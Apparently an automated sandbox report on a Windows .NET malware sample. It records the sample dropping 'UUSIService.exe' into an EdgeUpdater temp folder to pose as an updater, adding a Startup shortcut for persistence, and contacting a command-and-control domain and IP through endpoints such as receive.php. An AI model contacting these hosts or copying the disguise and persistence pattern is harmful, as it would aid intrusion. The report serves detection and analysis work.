Source: UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eu
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eud
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_filT
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000302E000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_file.php
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000302E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_update.php
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/receive.php
Source: UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/t
Source: UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.euD

Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:50005 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_01384D40	2_2_01384D40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_01386E58	2_2_01386E58
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_01386E49	2_2_01386E49

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 964

Source: Yc9hcFC1ux.exe, 00000000.00000000.2116860328.0000000000082000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLKSM.exe8 vs Yc9hcFC1ux.exe
Source: Yc9hcFC1ux.exe, 00000000.00000002.2123515607.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Yc9hcFC1ux.exe
Source: Yc9hcFC1ux.exe, 00000000.00000002.2123515607.000000000091A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLKSM.exe8 vs Yc9hcFC1ux.exe
Source: Yc9hcFC1ux.exe	Binary or memory string: OriginalFilenameLKSM.exe8 vs Yc9hcFC1ux.exe

Source: Yc9hcFC1ux.exe, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: UUSIService.exe.0.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: EdgeUpdaters.exe.2.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Yc9hcFC1ux.exe, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ==', 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ=='
Source: UUSIService.exe.0.dr, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ==', 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ=='
Source: EdgeUpdaters.exe.2.dr, QXV0b1NldHVwQUFB.cs	Base64 encoded string: 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ==', 'SDuElAyaoLMSBIhPH+ofpmVop6v3uSVAyvgTGJqmS72CI507wdy9c5JC3qB02HOV', 'lS6+mkWe/Lq0iA48dAzfXaI0bccm5hMr1Y8PDxEwJ9S4k8lFNV++BQ=='

Source: classification engine

Classification label: mal84.winEXE@21/158@2/2

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4560
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1052
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4208
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1948
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6476
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7104
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6416

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater

Jump to behavior

Source: Yc9hcFC1ux.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Yc9hcFC1ux.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Yc9hcFC1ux.exe	ReversingLabs: Detection: 64%
Source: Yc9hcFC1ux.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

File read: C:\Users\user\Desktop\Yc9hcFC1ux.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Yc9hcFC1ux.exe "C:\Users\user\Desktop\Yc9hcFC1ux.exe"
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 964
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 956
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 948
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 948
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 948
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 948
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6416 -s 948
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 948
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
